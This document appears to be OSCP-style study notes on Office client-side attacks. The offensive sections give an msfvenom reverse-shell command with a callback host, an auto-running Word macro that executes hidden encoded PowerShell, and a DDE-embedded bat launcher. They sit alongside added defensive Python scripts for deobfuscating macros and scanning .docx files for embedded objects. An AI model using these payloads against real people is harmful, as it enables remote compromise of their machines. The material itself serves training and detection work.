Client-side Exploit

Windows Office Macro

Here is a sample from OSCP course:

First use msfvenom to create a reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.176 LPORT=443 -f hta-psh -o evil.hta

In the file evil.hta, you will see the PowerShell command line with its script encoded in base64.

In a macro, the maximum length of a string is only 50 characters, so we have to split the encoded command into chunks. Here is an example Python script that emits one concatenation line per chunk:

# Placeholder: paste the encoded PowerShell command line from evil.hta here
payload = "<powershell script>"
n = 50  # maximum string length the macro accepts

# Emit one `Str = Str + "..."` line per 50-character chunk
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i + n] + '"')

Then we can craft our Word macro:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -e ...."
    Str = Str + ...
    <paste the output of the python script here>
    CreateObject("Wscript.Shell").Run Str
End Sub

When the Office client opens this document, the reverse shell will call back.
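A defender looking at a macro like this has to undo the concatenation before the command can be read at all. The following Python script is an added example, not code from the course or from this page: it reassembles `Str = Str + "..."` chains (both `+` and `&`), locates a PowerShell command line with an encoded command, decodes the base64/UTF-16LE payload, and reports the auto-execution hooks and `Wscript.Shell` usage that an analyst or a detection rule would key on. The macro it parses is constructed inline with a harmless encoded command, so the script runs offline.

```python
import base64
import re

# Sub names Word/Excel run automatically on open (heuristic list, an assumption)
AUTO_EXEC_NAMES = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose", "Workbook_Open")

# `Name = <rhs>` statement
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.*?)\s*$')
# Either a VBA string literal ("" escapes a quote) or an identifier
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')
# powershell ... -e/-ec/-en/-enc/-encodedcommand <base64>
ENCODED_RE = re.compile(
    r'(?i)powershell(?:\.exe)?\b.*?\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)')


def _encode_ps(cmd: str) -> str:
    """Base64 form that powershell.exe -e expects (UTF-16LE), used only to
    build the constructed sample below."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample macro in the shape the page describes; the encoded
# command is a harmless Write-Output, not a real payload.
_SAMPLE_ENCODED = _encode_ps("Write-Output 'constructed sample command'")
SAMPLE_MACRO = "\n".join(
    ["Sub AutoOpen()", "    MyMacro", "End Sub", "", "Sub MyMacro()",
     "    Dim Str As String",
     '    Str = "powershell.exe -nop -w hidden -e "']
    + [f'    Str = Str + "{_SAMPLE_ENCODED[i:i + 50]}"'
       for i in range(0, len(_SAMPLE_ENCODED), 50)]
    + ['    CreateObject("Wscript.Shell").Run Str', "End Sub"])


def reassemble_strings(vba: str) -> dict:
    """Follow `X = "..."` and `X = X + "..."` / `X = X & "..."` statements and
    return the fully concatenated value of every string variable.
    Only literals and the variable itself are followed; calls such as Chr()
    are ignored, which is a known limitation of this simple pass."""
    values = {}
    for line in vba.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        acc = ""
        for lit, ident in TOKEN_RE.findall(rhs):
            if ident == name:            # self-reference: X = X + ...
                acc += values.get(name, "")
            elif ident == "":            # a string literal token
                acc += lit.replace('""', '"')
        values[name] = acc
    return values


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a `powershell -e <base64>` command line, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")


def analyze_macro(vba: str) -> dict:
    """Report the indicators a triage script would raise on this macro."""
    values = reassemble_strings(vba)
    auto_exec = [n for n in AUTO_EXEC_NAMES
                 if re.search(r'(?i)\bSub\s+' + re.escape(n) + r'\b', vba)]
    uses_shell = bool(re.search(r'(?i)wscript\.shell', vba))
    command = decoded = None
    for val in values.values():
        if ENCODED_RE.search(val):
            command, decoded = val, decode_encoded_command(val)
            break
    return {
        "auto_exec": auto_exec,
        "uses_wscript_shell": uses_shell,
        "command": command,
        "decoded": decoded,
        # auto-run hook + shell object + hidden encoded PowerShell is the
        # combination worth alerting on
        "suspicious": bool(auto_exec) and uses_shell and decoded is not None,
    }


if __name__ == "__main__":
    for k, v in analyze_macro(SAMPLE_MACRO).items():
        print(f"{k}: {v}")
```

The same reassembly step is what sandbox tools do before applying signatures, which is why matching on the split 50-character chunks alone is a weak detection: match on the decoded command and on the AutoOpen + Wscript.Shell combination instead.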

Windows Office DDE

You can embed a bat file, which gives us a reverse shell when a user clicks on the DDE object.

Prepare a bat file like this:

START powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQA......

Then in Office, on the Insert ribbon choose Object > Create from File and select your bat script. You can even display it as an icon and change the display name.
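Embedding a script this way leaves a recognisable trace in the document itself: the .docx zip gains a word/embeddings/ entry, and word/document.xml carries an `<o:OLEObject>` element whose ProgID is "Package" (the Packager object Word uses for arbitrary non-Office files, as I understand it) with DrawAspect="Icon" when it is shown as an icon. The following Python script is an added example, not code from the page: it builds a minimal constructed .docx-like zip in memory and scans it for exactly those indicators, the kind of check a mail gateway or a triage script can run before a user ever double-clicks the object. The XML is deliberately minimal and is inspected with regular expressions rather than a full OOXML parser.

```python
import io
import re
import zipfile

OLE_RE = re.compile(r'<o:OLEObject\b([^>]*?)/?>')
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def build_sample_docx(embed: bool) -> bytes:
    """Construct a minimal .docx-like zip in memory (constructed sample, not a
    real document). With embed=True it carries an embedded Package object the
    way Insert > Object > Create from File produces one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        body = '<w:document><w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p>'
        if embed:
            body += ('<w:p><w:r><w:object><o:OLEObject Type="Embed" ProgID="Package" '
                     'ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1" '
                     'r:id="rId1"/></w:object></w:r></w:p>')
        body += '</w:body></w:document>'
        z.writestr("word/document.xml", body)
        if embed:
            # OLE compound-file magic followed by filler: stands in for the
            # packaged script, which this example never contains
            z.writestr("word/embeddings/oleObject1.bin",
                       b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


def scan_docx(data: bytes) -> dict:
    """List embedded parts and OLE object declarations, and flag the
    'Package object shown as icon' pattern described above."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        embeddings = [n for n in names if n.startswith("word/embeddings/")]
        xml = ""
        if "word/document.xml" in names:
            xml = z.read("word/document.xml").decode("utf-8", "replace")
    objects = [dict(ATTR_RE.findall(attrs)) for attrs in OLE_RE.findall(xml)]
    packages = [o for o in objects if o.get("ProgID") == "Package"]
    return {
        "embedded_files": embeddings,
        "ole_objects": objects,
        "package_objects": len(packages),
        "shown_as_icon": any(o.get("DrawAspect") == "Icon" for o in packages),
        # an embedded part plus a Package object is the pattern to quarantine
        "flag": bool(embeddings) and bool(packages),
    }


if __name__ == "__main__":
    for embed in (False, True):
        print(scan_docx(build_sample_docx(embed)))
```

Because the scan only reads zip entry names and one XML part, it is cheap enough to run on every inbound document; the embedded binary itself can then be handed to a sandbox only when the flag is set.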
